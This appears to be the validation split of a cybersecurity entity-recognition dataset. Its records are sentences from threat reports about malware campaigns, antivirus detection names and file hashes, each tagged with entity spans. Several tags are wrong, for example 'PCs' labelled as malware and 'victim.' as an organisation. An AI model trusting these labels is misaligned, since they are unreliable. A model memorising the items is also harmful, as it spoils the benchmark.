{"text": "Furthermore , it can grant the “ com.qualcmm.timeservices ” app Device Administrator rights without any interaction with the user , just by running commands .", "spans": {}, "info": {"id": "cyner2_valid_000491", "source": "cyner2_valid"}}
{"text": "leetMX is a widespread cyber-attack campaign originating from Mexico and focused on targets in Mexico, El Salvador, and other countries in Latin America, such as Guatemala, Argentina and Costa Rica.", "spans": {"Malware: leetMX": [[0, 6]]}, "info": {"id": "cyner2_valid_000492", "source": "cyner2_valid"}}
{"text": "Creation date is a week before the start of the tournament .", "spans": {}, "info": {"id": "cyner2_valid_000493", "source": "cyner2_valid"}}
{"text": "The block is decrypted using a customized algorithm that uses a key derived from the original malware dropper ’ s TimeDateStamp field multiplied by 5 .", "spans": {}, "info": {"id": "cyner2_valid_000494", "source": "cyner2_valid"}}
{"text": "These events can be based on time , charging or battery status , location , connectivity , running apps , focused app , SIM card status , SMS received with keywords , and screen turning on .", "spans": {}, "info": {"id": "cyner2_valid_000495", "source": "cyner2_valid"}}
{"text": "For example , the US ( with around 303k infections ) , Saudi Arabia ( 245k ) , Australia ( 141k ) and the UK ( 137k ) .", "spans": {}, "info": {"id": "cyner2_valid_000496", "source": "cyner2_valid"}}
{"text": "The year is 2015 and a threat actor is using the defunct Blackhole exploit kit in active drive-by download campaigns via compromised websites.", "spans": {"Malware: Blackhole exploit kit": [[57, 78]]}, "info": {"id": "cyner2_valid_000497", "source": "cyner2_valid"}}
{"text": "However, over the past two weeks we are seeing these malicious VBA macros leveraged to drop Kasidet backdoor in addition to Dridex on the infected systems.", "spans": {"Vulnerability: malicious VBA macros": [[53, 73]], "Malware: Kasidet backdoor": [[92, 108]], "Malware: Dridex": [[124, 130]], "System: infected systems.": [[138, 155]]}, "info": {"id": "cyner2_valid_000498", "source": "cyner2_valid"}}
{"text": "When it comes to exploit kits, it's all about the timing.", "spans": {"Malware: exploit kits,": [[17, 30]]}, "info": {"id": "cyner2_valid_000499", "source": "cyner2_valid"}}
{"text": "We have found that those computers, used by Odatv journalists Baris Pehlivan and Muyesser Yildiz, were attacked in a relentless and fascinating fashion - ultimately resulting in placement of the incriminating documents just prior to seizure by the Turkish National Police.", "spans": {"System: computers,": [[25, 35]], "Organization: Odatv journalists Baris Pehlivan": [[44, 76]], "Organization: Muyesser Yildiz,": [[81, 97]], "Organization: the Turkish National Police.": [[244, 272]]}, "info": {"id": "cyner2_valid_000501", "source": "cyner2_valid"}}
{"text": "Monitoring Broadcast Events XLoader registers many broadcast receivers in the payload dynamically ( to monitor broadcast events sent between system and applications ) .", "spans": {"Malware: XLoader": [[28, 35]]}, "info": {"id": "cyner2_valid_000502", "source": "cyner2_valid"}}
{"text": "In May 2017, Volexity identified and started tracking a very sophisticated and extremely widespread mass digital surveillance and attack campaign targeting several Asian nations, the ASEAN organization, and hundreds of individuals and organizations tied to media, human rights and civil society causes.", "spans": {"Organization: Volexity": [[13, 21]], "Organization: the ASEAN organization,": [[179, 202]], "Organization: individuals": [[219, 230]], "Organization: organizations": [[235, 248]], "Organization: media, human rights": [[257, 276]], "Organization: civil society causes.": [[281, 302]]}, "info": {"id": "cyner2_valid_000503", "source": "cyner2_valid"}}
{"text": "They did this at least 5 times between 18 April and 15 May .", "spans": {}, "info": {"id": "cyner2_valid_000504", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Backdoor.Kerlisen Win32.Trojan.WisdomEyes.16070401.9500.9830 Trojan.Win64.Derusbi.evunii Trojan.Win64.Derusbi BDS/Derusbi.vvvng Trj/CI.A W64/Derusbi.AE!tr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000505", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: X97M.Downloader.DQ Trojan.Mdropper X2KM_POWLOAD.AUSUBZY X97M.Downloader.DQ X97M.Downloader.DQ X2KM_POWLOAD.AUSUBZY X97M.Downloader.DQ X97M.Downloader.DQ Macro.Trojan.Dropperx.Auto virus.office.qexvmc.1080", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000506", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan/W32.Small.44544.QJ Hacktool.Elsashes Win32.Trojan.WisdomEyes.16070401.9500.9938 Trojan.PWS.Gamania.35775 W32/Trojan.BEBP-5282 HackTool:Win32/Elsashes.A Adware/Win32.NaviPromo.R36681 Trj/CI.A Virus.Win32.Virut.tv Win32/Trojan.481", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000507", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.Zusy.D3615C Win32.Trojan.WisdomEyes.16070401.9500.9574 W32/Zanich.A DDOS_ZANICH.SM Trojan.Win32.Dwn.dmxhxz Trojan.DownLoader12.12365 Backdoor.Klon.Win32.2511 DDOS_ZANICH.SM W32/Trojan.KISP-6625 TR/Crypt.ZPACK.dhukj DDoS:Win32/Zanich.D OScope.Trojan.DClient.2115 Win32/Trojan.fa8", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000508", "source": "cyner2_valid"}}
{"text": "Usually , PHA authors attempt to install their harmful apps on as many devices as possible .", "spans": {}, "info": {"id": "cyner2_valid_000511", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.Runwaprep.A5 Adware.Amonetize.Win32.18133 Win.Trojan.Graftor-5589 Win32.Trojan.Bayrob.M Trojan.Win32.Symmi.ebmlae TR/Graftor.155364 Trojan.Ursu.D1537 Trojan:Win32/Runwaprep.A Trojan/Win32.Graftor.R181756 Trojan.ATRAPS!SfirfEHIKQo Win32/Trojan.861", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000512", "source": "cyner2_valid"}}
{"text": "Using data collected from the Lookout global sensor network , the Lookout research team was able to gain unique visibility into the ViperRAT malware , including 11 new , unreported applications .", "spans": {"Organization: Lookout": [[30, 37]], "Malware: ViperRAT": [[132, 140]]}, "info": {"id": "cyner2_valid_000513", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Heur.Corrupt.PE Trojan[Backdoor]/Win32.Last2000 Backdoor:Win32/Last2000.B.dam#2 Trj/CI.A Backdoor.Win32.Last2000", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000514", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.Multi Trojan.Win32.Llac.lknx Trojan.Win32.Llac.exokwu Uds.Dangerousobject.Multi!c Tool.PassView.1835 BehavesLike.Win32.Fareit.jc Trojan.Llac.eqh TR/Dropper.MSIL.raxhc TrojanSpy:MSIL/Siplog.B Trojan.Win32.Llac.lknx Trojan/Win32.MSIL.R219591 Spyware.PasswordStealer Trj/GdSda.A Trojan.Inject", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000515", "source": "cyner2_valid"}}
{"text": "In our April 2017 posting OilRig Actors Provide a Glimpse into Development and Testing Efforts we showed how we observed the OilRig threat group developing and refining these Clayside delivery documents.", "spans": {}, "info": {"id": "cyner2_valid_000516", "source": "cyner2_valid"}}
{"text": "In this context , there is indeed no need to execute the stage 4 malware .", "spans": {}, "info": {"id": "cyner2_valid_000517", "source": "cyner2_valid"}}
{"text": "This version appeared as Wabi Music , and copied a popular video-sharing social networking service as its backend login page .", "spans": {}, "info": {"id": "cyner2_valid_000518", "source": "cyner2_valid"}}
{"text": "Moreover , there is a special handler for the accelerometer that is able to calculate and log the device ’ s speed : This feature is used in particular by the command “ tk0 ” that mutes the device , disables keyguard , turns off the brightness , uses wakelock and listens to device sensors .", "spans": {}, "info": {"id": "cyner2_valid_000519", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.Win32.Gamania.bbzfkj Win32/Gamepass.LKO Trojan.PWS.Gamania.17044 Trojan/PSW.OnLineGames.vyd TrojanDropper:Win32/Lmir.D Win-Trojan/OnlineGameHack.23362 Trojan-Downloader.Win32.Banload Trj/CI.A", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000520", "source": "cyner2_valid"}}
{"text": "This allows the PHA authors to monetize their apps more effectively than through regular advertising .", "spans": {}, "info": {"id": "cyner2_valid_000521", "source": "cyner2_valid"}}
{"text": "Kaspersky detects and blocks samples of the ViceLeaker operation using the following verdict : Trojan-Spy.AndroidOS.ViceLeaker .", "spans": {"Organization: Kaspersky": [[0, 9]], "Malware: ViceLeaker": [[44, 54]]}, "info": {"id": "cyner2_valid_000522", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: W32.FakeWinLogoA.fam.Trojan Trojan.Win32.VB!O Worm.VB.Win32.7606 Trojan.Gosys.1 Win32.Trojan.WisdomEyes.16070401.9500.9995 WORM_OTORUN.NM Win.Trojan.Kazy-242 Trojan.Win32.VB.asju Trojan.Win32.VB.eaexwa Trojan.Win32.A.VB.36864.ER TrojWare.Win32.Autorun.JT Win32.HLLW.Autoruner.57272 WORM_OTORUN.NM BehavesLike.Win32.Vilsel.cz Virus.Win32.VB Worm/VBNA.hbub Trojan/Win32.VB Worm:Win32/Dodinsom.A IM-Flooder.W32.Delf.l2lu Trojan.Win32.VB.asju Trojan/Win32.VB.R40603 Swisyn.j Trojan.VBRA.02146 Trojan.VB!Uj7xS4Q/gyQ W32/Swisyn.C.worm", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000523", "source": "cyner2_valid"}}
{"text": "Recently, we found another unique method being used to deliver malware—abusing the action that happens when simply hovering the mouse's pointer over a hyperlinked picture or text in a PowerPoint slideshow.", "spans": {"Malware: malware—abusing": [[63, 78]]}, "info": {"id": "cyner2_valid_000524", "source": "cyner2_valid"}}
{"text": "On attribution Media reporting on ViperRAT thus far attributes this surveillanceware tool to Hamas .", "spans": {"Malware: ViperRAT": [[34, 42]], "Organization: Hamas": [[93, 98]]}, "info": {"id": "cyner2_valid_000525", "source": "cyner2_valid"}}
{"text": "Recently the Unit 42 research team have been investigating a wave of Nemucod downloader malware that uses weaponized documents to deploy encoded, and heavily obfuscated JavaScript, ultimately leading to further payloads being delivered to the victim.", "spans": {"Organization: Unit 42 research team": [[13, 34]], "Malware: Nemucod downloader malware": [[69, 95]], "System: JavaScript,": [[169, 180]], "Malware: payloads": [[211, 219]], "Organization: victim.": [[243, 250]]}, "info": {"id": "cyner2_valid_000526", "source": "cyner2_valid"}}
{"text": "HummingWhale , as the professionally developed malware has been dubbed , is a variant of HummingBad , the name given to a family of malicious apps researchers documented in July invading non-Google app markets .", "spans": {"Malware: HummingWhale": [[0, 12]], "Malware: HummingBad": [[89, 99]]}, "info": {"id": "cyner2_valid_000527", "source": "cyner2_valid"}}
{"text": "Download and launch a cryptocurrency mining utility. Attack other computers of the network in order to install its own copy on them.", "spans": {"System: computers": [[66, 75]], "System: network": [[83, 90]]}, "info": {"id": "cyner2_valid_000528", "source": "cyner2_valid"}}
{"text": "In our latest discovery, it seems these threat actors are aware of each others activities and are fighting a battle for control of compromised machines.", "spans": {"System: compromised machines.": [[131, 152]]}, "info": {"id": "cyner2_valid_000529", "source": "cyner2_valid"}}
{"text": "Targeted e-mails are cheating real people and are sent from domestic free e-mail addresses.", "spans": {}, "info": {"id": "cyner2_valid_000531", "source": "cyner2_valid"}}
{"text": "The leaked data alone cannot identify specific individuals targeted by NIS, nor prove misuse of the technology; further investigation and research is necessary to make those determinations.", "spans": {}, "info": {"id": "cyner2_valid_000532", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Backdoor.VawtrakCS.S452016 Backdoor.Androm.Win32.27664 Trojan/Spy.Shiz.nct BKDR_VAWTRAK_GB280010.UVPM Win32.Trojan.WisdomEyes.16070401.9500.9999 Infostealer.Shifu BKDR_VAWTRAK_GB280010.UVPM Trojan.DownLoader17.28491 Backdoor.Win32.Vawtrak Trojan[Backdoor]/Win32.Androm Backdoor.W32.Androm.mAsy Win32.Trojan-Ransom.TeslaCrypt.N Win32/Spy.Shiz.NCT Backdoor.Androm!pk2i4esPAGA W32/Papras.EH!tr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000534", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: HW32.Packed.B9B1 Win32/Sisron.cRTWXW Trojan-Ransom.Win32.Blocker.dafn Trojan.DownLoader10.62041 BehavesLike.Win32.Trojan.cc Trojan/Blocker.acif Trojan[Ransom]/Win32.Blocker Win32.Troj.Undef.kcloud Trojan/Win32.Blocker Trj/CI.A Win32.Trojan.Blocker.Wtdh Backdoor.Win32.Hupigon", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000535", "source": "cyner2_valid"}}
{"text": "As seen in Figure 2 , the app tries to open the payload from the /res/raw/ directory and generate an additional Android Package Kit ( APK ) named .app.apk : Decoy Code Figure 2 : The decoy code for the fake TikTok .", "spans": {"System: Android Package Kit": [[112, 131]], "System: TikTok": [[207, 213]]}, "info": {"id": "cyner2_valid_000536", "source": "cyner2_valid"}}
{"text": "In our analysis , one activity group stood out : NEODYMIUM .", "spans": {"Malware: NEODYMIUM": [[49, 58]]}, "info": {"id": "cyner2_valid_000537", "source": "cyner2_valid"}}
{"text": "Currently , all bespoke apps have been taken down from the Google Play store .", "spans": {"System: Google Play": [[59, 70]]}, "info": {"id": "cyner2_valid_000538", "source": "cyner2_valid"}}
{"text": "As it turned out, the email address was similar to Rasul's, but it was not his, and the attachment his friend alluded to contained a virus.", "spans": {"Organization: Rasul's,": [[51, 59]], "Malware: virus.": [[133, 139]]}, "info": {"id": "cyner2_valid_000539", "source": "cyner2_valid"}}
{"text": "In addition future Trojans could leverage root exploits to make them almost impossible to remove and give malicious actors the ability to hook generic low level API ’ s that are used by all ( banking ) applications , just like the attack vector as has been used on the desktop platform for years .", "spans": {}, "info": {"id": "cyner2_valid_000540", "source": "cyner2_valid"}}
{"text": "In December 2015, Unit 42 published a blog about a cyber espionage attack using the Emissary Trojan as a payload.", "spans": {"Organization: Unit 42": [[18, 25]], "Malware: Emissary Trojan": [[84, 99]], "Malware: payload.": [[105, 113]]}, "info": {"id": "cyner2_valid_000541", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: VirTool.Obfuscator.AO3 Trojan.MSIL.Androm.9 Backdoor.Trojan Trojan.Win32.Androm.evsiaw BehavesLike.Win32.PUPXBW.wm W32/Trojan.NTQH-5723 TR/Dropper.MSIL.sexdc Backdoor:MSIL/Sisbot.A Trj/GdSda.A MSIL/Dropper.XXX!tr Win32/Backdoor.990", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000544", "source": "cyner2_valid"}}
{"text": "Links between XLoader and FakeSpy can give clues to the much broader inner workings of the threat actors behind them .", "spans": {"Malware: XLoader": [[14, 21]], "Malware: FakeSpy": [[26, 33]]}, "info": {"id": "cyner2_valid_000545", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: W32.TanraB.Trojan Trojan.Win32.Clicker!BT Trojan-Clicker.MSIL.Small.dk Trojan.Win32.KillFiles.dztmit Trojan.KillFiles.23773 Trojan.Kazy.D7B695 Trojan-Clicker.MSIL.Small.dk TrojanClicker:MSIL/Redilur.A Trojan/Win32.Asprox.C683680 Trojan.Win32.Clicker!BT Trj/CI.A MSIL/TrojanClicker.Small.NAS MSIL/Small.NAS!tr Win32/Trojan.341", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000546", "source": "cyner2_valid"}}
{"text": "Hacking Team has been known to use both CVE-2014-3153 and CVE-2013-6282 in their attacks .", "spans": {"Vulnerability: CVE-2014-3153": [[40, 53]], "Vulnerability: CVE-2013-6282": [[58, 71]]}, "info": {"id": "cyner2_valid_000547", "source": "cyner2_valid"}}
{"text": "UDP requires no prior server-side response, further reducing network traffic and malware communication complexity.", "spans": {"System: UDP": [[0, 3]], "System: server-side": [[22, 33]], "System: network traffic": [[61, 76]], "Malware: malware": [[81, 88]]}, "info": {"id": "cyner2_valid_000548", "source": "cyner2_valid"}}
{"text": "PIVY has been observed targeting a number of Asian countries for various purposes over the past year.", "spans": {"Malware: PIVY": [[0, 4]]}, "info": {"id": "cyner2_valid_000549", "source": "cyner2_valid"}}
{"text": "The approach of the Google Play campaigns is different: everything is designed to gain the trust of the user.", "spans": {"System: the Google Play": [[16, 31]]}, "info": {"id": "cyner2_valid_000551", "source": "cyner2_valid"}}
{"text": "The infected app steals contacts and SMS messages from the user ’ s device and asks for admin permissions .", "spans": {}, "info": {"id": "cyner2_valid_000552", "source": "cyner2_valid"}}
{"text": "This is done in the function initComponents .", "spans": {}, "info": {"id": "cyner2_valid_000553", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan/Kryptik.aocd Trojan.Tarctox.1 TROJ_SPNR.35CD13 Win32.Trojan.WisdomEyes.16070401.9500.9854 W32/Trojan.XTKA-9297 TROJ_SPNR.35CD13 Trojan.Win32.Sputnik.bfdeir Backdoor.W32.Sputnik!c TrojWare.Win32.Kryptik.ANIS Trojan.MulDrop4.21354 Trojan.Kryptik.Win32.331530 Trojan.Crypt Backdoor/Sputnik.c Trojan[Backdoor]/Win32.Sputnik TrojanDropper:Win32/Tarctox.B W32/Kryptik.APOJ!tr Win32/Trojan.814", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000554", "source": "cyner2_valid"}}
{"text": "Other than that , its major functionality is to collect private device information , upload it to a remote C2 server , and handle any commands as requested by the C2 server .", "spans": {}, "info": {"id": "cyner2_valid_000555", "source": "cyner2_valid"}}
{"text": "It is in the run up to this time that most organisations see an increase in targeted attack activity.", "spans": {}, "info": {"id": "cyner2_valid_000556", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: W32.Spybot.Worm Win32/Spybot.JB WORM_SPYBOT.L Worm.Win32.SpyBot.MI Win32.HLLW.SpyBot Worm/Spybot.BU WORM_SPYBOT.L Worm.SpyBot.gl.kcloud Win32/SpyBot.worm.30772 Malware-Cryptor.Zhelatin.Net Net-Worm.Spybot.C!rem Win32/SpyBot.MI P2P-Worm.Win32.SpyBot.gl", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000557", "source": "cyner2_valid"}}
{"text": "This family of malware has a significant history associated with malware distribution.", "spans": {"Malware: This family of malware": [[0, 22]], "Malware: malware": [[65, 72]]}, "info": {"id": "cyner2_valid_000558", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.Graftor.D16DB Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Win32.S.Diple.53760 TR/Graftor.5851.A Trojan:Win32/Crix.A Trojan/Win32.Diple.R17533 BScope.Malware-Cryptor.4112 Trj/CI.A Win32/Trojan.7e2", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000560", "source": "cyner2_valid"}}
{"text": "Once socially engineered users execute the malware variant, their PCs automatically join the botnet operated by the cybercriminals behind the campaign.", "spans": {"Malware: malware": [[43, 50]], "Malware: PCs": [[66, 69]], "Malware: botnet": [[93, 99]]}, "info": {"id": "cyner2_valid_000561", "source": "cyner2_valid"}}
{"text": "“ Agent Smith ” currently uses its broad access to the device ’ s resources to show fraudulent ads for financial gain .", "spans": {"Malware: Agent Smith": [[2, 13]]}, "info": {"id": "cyner2_valid_000562", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.Chepdu.R Trojan.Chepdu.Win32.496 Trojan/Chepdu.ac Win32.Trojan.WisdomEyes.16070401.9500.9882 Win.Trojan.Chepdu-329 TrojWare.Win32.BHO.SC Trojan:Win32/Chepdu.P TR/Chepdu.IA Trojan/Win32.Unknown Trojan:Win32/Chepdu.V Downloader/Win32.Banload.R8388 Trojan.Chepdu.2 Trojan-Downloader.Win32.Banload", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000563", "source": "cyner2_valid"}}
{"text": "How it Works In order to get into the Google Play Store , the malware uses a phased approach which is quite a common practice for malware authors these days .", "spans": {"System: Google Play": [[38, 49]]}, "info": {"id": "cyner2_valid_000564", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.Hacktool.Vb.CM HackTool.Win32.VB!O HackTool.VB Trojan.Hacktool.Vb.CM Trojan/Hacktool.VB.cm TROJ_VB.CM W32/Tool.JIYM-1294 TROJ_VB.CM Win.Tool.Hot-6 Trojan.Hacktool.Vb.CM HackTool.Win32.VB.cm Trojan.Hacktool.Vb.CM Riskware.Win32.VB.hshn Hacktool.W32.Vb!c Trojan.Hacktool.Vb.CM Trojan.Hacktool.Vb.CM Tool.VB.Win32.1297 BehavesLike.Win32.BadFile.cm HackTool.Win32.VB.CM W32/HackTool.BS HackTool.VB.HotmailCrook Win32.Hack.VB.cm.kcloud Trojan.Hacktool.Vb.CM HackTool.Win32.VB.cm HackTool:Win32/VB.CM Win32.Hacktool.Vb.Akfd HackTool.VB!Lx3YV53UVdw Win32/Trojan.Hacktool.198", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000565", "source": "cyner2_valid"}}
{"text": "We at ESET recently discovered an interesting stealth attack on Android users, an app that is a regular game but with one interesting addition: the application was bundled with another application with the name systemdata or resourcea and that's certainly a bit fishy.", "spans": {"Organization: ESET": [[6, 10]], "System: Android users,": [[64, 78]], "System: app": [[82, 85]], "System: regular game": [[96, 108]]}, "info": {"id": "cyner2_valid_000566", "source": "cyner2_valid"}}
{"text": "This is a complex campaign that they have called Hiatus", "spans": {}, "info": {"id": "cyner2_valid_000567", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.Dropper.TMK Trojan.Scar.bxrc Trojan/Scar.bxrc Trojan.Spawnt.A Win32/AutoRun.NAS W32/Scar.AG W32/NetworkWorm.HZP TROJ_FAM_000007e.TOMA Trojan.Scar-240 Trojan.Win32.Scar.bxrc Trojan.Dropper.TMK TrojWare.Win32.Scar.M Trojan:W32/Scar.M TR/Scar.bxrb TROJ_FAM_000007e.TOMA Trojan.Win32.Scar!IK Win32/Scar.BG W32/Scar.AG Trojan/Scar.twy Trojan:Win32/Spawnt.A Trojan.Win32.Scar.51200.C Trojan.Dropper.TMK Trojan.Win32.Scar.bxrc Trojan.Win32.Scar W32/Scar.C Trj/Downloader.MDW", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000568", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.Downloader.JNXM Trojan.Downloader.JNXM Trojan.Downloader.JNXM Trojan.Win32.DownLoad2.dkqeh Trojan.Downloader.JNXM Trojan.Downloader.JNXM Trojan.DownLoad2.19268 BehavesLike.Win32.Dropper.dc Trojan[Downloader:HEUR]/Win32.Unknown Trojan.Downloader.JNXM TrojanDownloader:Win32/Borpe.A Trojan/Win32.Overtls.N205928299 Trojan.Downloader.JNXM W32/Delf.BHO!tr.dldr Trj/CI.A", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000569", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan-Ransom.Win32.Foreign!O Trojan.Kazy.D20232 Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan-Ransom.Win32.Foreign.xoz Trojan.Win32.Inject.bgixdn Trojan.Winlock.7262 BehavesLike.Win32.ICLoader.cc Trojan-Downloader.Win32.Cbeplay Trojan[Ransom]/Win32.Foreign TrojanDownloader:Win32/Cbeplay.P Trojan-Ransom.Win32.Foreign.xoz Spyware/Win32.Zbot.R47488 TScope.Malware-Cryptor.SB Trojan.FakeMS.ED Trj/Ransom.AB Win32.Trojan.Foreign.cssl Trojan.Foreign!QkpGO9V1pnQ Win32/Trojan.Ransom.0d9", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000570", "source": "cyner2_valid"}}
{"text": "A good example is provided by Turla's watering hole campaigns.", "spans": {}, "info": {"id": "cyner2_valid_000571", "source": "cyner2_valid"}}
{"text": "Of the various binaries downloaded , the most interesting are null , which serves as a local and reverse shell , and rootdaemon , which takes care of privilege escalation and data acquisition .", "spans": {}, "info": {"id": "cyner2_valid_000572", "source": "cyner2_valid"}}
{"text": "The Trojan allows the criminals to remotely control the victim ’ s computer and is capable of recording sound from a microphone .", "spans": {}, "info": {"id": "cyner2_valid_000573", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: W32.ElaxanD.Trojan Packed.Win32.TDSS!O Worm.Kufgal.13650 Backdoor/Wuca.lt Win32.Trojan.WisdomEyes.16070401.9500.9997 Win32/Kufgal.AD WORM_KUFGAL.SMA Trojan.Win32.Wuca.bszqq Packer.W32.Tibs.l4Hz Win32.Backdoor.Wuca.cvxl Trojan.Copyself.112 Backdoor.Wuca.Win32.1016 WORM_KUFGAL.SMA Backdoor.Win32.Wuca Backdoor/Wuca.gs Backdoor.Win32.S.Wuca.8864 Worm:Win32/Kufgal.A Trojan/Win32.MalPack.C155329 W32/Wuca.OD!tr Backdoor.Wuca Win32/Trojan.34d", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000574", "source": "cyner2_valid"}}
{"text": "File Name Modified Date SHA256 null_arm 2018-02-27 06:44:00 48a7dd672931e408662d2b5e1abcd6ef00097b8ffe3814f0d2799dd6fd74bd88 null_i686 2018-02-27 06:44:00 c228a534535b22a316a97908595a2d793d0fecabadc32846c6d1bfb08ca9a658 null_arm64 2018-02-27 06:43:00 48a7dd672931e408662d2b5e1abcd6ef00097b8ffe3814f0d2799dd6fd74bd88 sepolicy-inject_arm 2019-01-08 04:55:00 47449a612697ad99a6fbd6e02a84e957557371151f2b034a411ebb10496648c8 sepolicy-inject_arm64 2019-01-08 04:55:00 824ad333320cbb7873dc49e61c14f749b0e0d88723635524463f2e6f56ea133a sepolicy-inject_i686 2019-01-08 04:55:00 13ec6cec511297ac3137cf7d6e4a7c4f5dd2b24478a06262a44f13a3d61070b6 rootdaemon_arm 2019-01-08 04:55:00 00c787c0c0bc26caf623e66373a5aaa1b913b9caee1f34580bdfdd21954b7cc4 rootdaemon_arm64 2019-01-08 04:55:00 3ee3a973c62ba5bd9eab595a7c94b7a26827c5fa5b21964d511ab58903929ec5 mike.jar 2018-12-06 05:50:00 a42a05bf9b412cd84ea92b166d790e8e72f1d01764f93b05ace62237fbabe40e rootdaemon_i686 2019-01-08 04:55:00 b46f282f9a1bce3798faee3212e28924730a657eb93cda3824c449868b6ee2e7 zygotedaemonarm 2019-01-08 04:55:00 e3f65f84dd6c2c3a5a653a3788d78920c0321526062a6b53daaf23fa57778a5f zygotedaemonarm64 2019-01-08 04:55:00 11499ff2418f4523344de81a447f6786fdba4982057d4114f64db929990b4b59 zygotedaemoni686 2019-01-08 04:55:00 3c9f08b3280851f54414dfa5a57f40d3b7be7b73736fa0ba21b078e75ce54d33 sapp.apk 2019-01-08 04:53:00 4bf1446c412dd5c552539490d03e999a6ceb96ae60a9e7846427612bec316619 placeholder 2018-03-29 16:31:00 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 After download , Exodus One would dynamically load and execute the primary stage 2 payload mike.jar using the Android API DexClassLoader ( ) .", "spans": {"Malware: Exodus One": [[1545, 1555]], "System: Android API": [[1638, 1649]]}, "info": {"id": "cyner2_valid_000575", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.Script Ransom_Ysakrypt.R011C0DKP17 Trojan.Encoder.7240 Ransom_Ysakrypt.R011C0DKP17 BehavesLike.Win32.Downloader.gc TR/RedCap.rludy Trojan.Autoit Trj/CI.A Win32/Trojan.Script.ed4", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000576", "source": "cyner2_valid"}}
{"text": "One single domain easy-trading.biz is relaying all traffic to other ad networks' and ultimately to the Nuclear exploit kit.", "spans": {"Malware: Nuclear exploit kit.": [[103, 123]]}, "info": {"id": "cyner2_valid_000577", "source": "cyner2_valid"}}
{"text": "Allows an application to collect battery statistics Allows an app to access precise location .", "spans": {}, "info": {"id": "cyner2_valid_000578", "source": "cyner2_valid"}}
{"text": "From April 2016 and at least until February 2017, attackers have been spreading malware via fake Facebook profiles and pages, breached websites, self-hosted and cloud based websites.", "spans": {"Malware: spreading malware": [[70, 87]]}, "info": {"id": "cyner2_valid_000580", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Win32/FlyStudio.NVR W32/DLoader.AHYXT WORM_FLYSTUD.SMA Worm.FlyStudio-38 not-a-virus:AdWare.Win32.FlyStudio.h TrojWare.Win32.TrojanDownloader.Small.AA WORM_FLYSTUD.SMA Virus.Win32.Heur.c Trojan.Win32.FlyStudio.uk HeurEngine.MaliciousPacker Trj/FlyStudio.BQ", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000581", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan/Kryptik.cynw Win32.Trojan.WisdomEyes.16070401.9500.9949 Trojan.Win32.Bebloh.dnrhin Trojan.Win32.Z.Kryptik.541696.B TrojWare.Win32.Spy.Zbot.VAU Trojan.PWS.Panda.2401 TR/ZbotCitadel.A.907 Trojan/Win32.Buzus Trojan:Win32/Zapis.A Trojan.Graftor.D2ACEB Trojan/Win32.MDA.R134684 Trojan.Buzus Trojan.Buzus!H8PndnQYTT0 Trojan.Win32.Crypt W32/Kryptik.CYVK!tr Win32/Trojan.97a", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000582", "source": "cyner2_valid"}}
{"text": "The attackers, whom we have named Packrat, have shown a keen and systematic interest in the political opposition and the independent press in so-called ALBA countries Bolivarian Alternative for the Americas, and their recently allied regimes.", "spans": {"Organization: political opposition": [[92, 112]], "Organization: the independent press": [[117, 138]]}, "info": {"id": "cyner2_valid_000583", "source": "cyner2_valid"}}
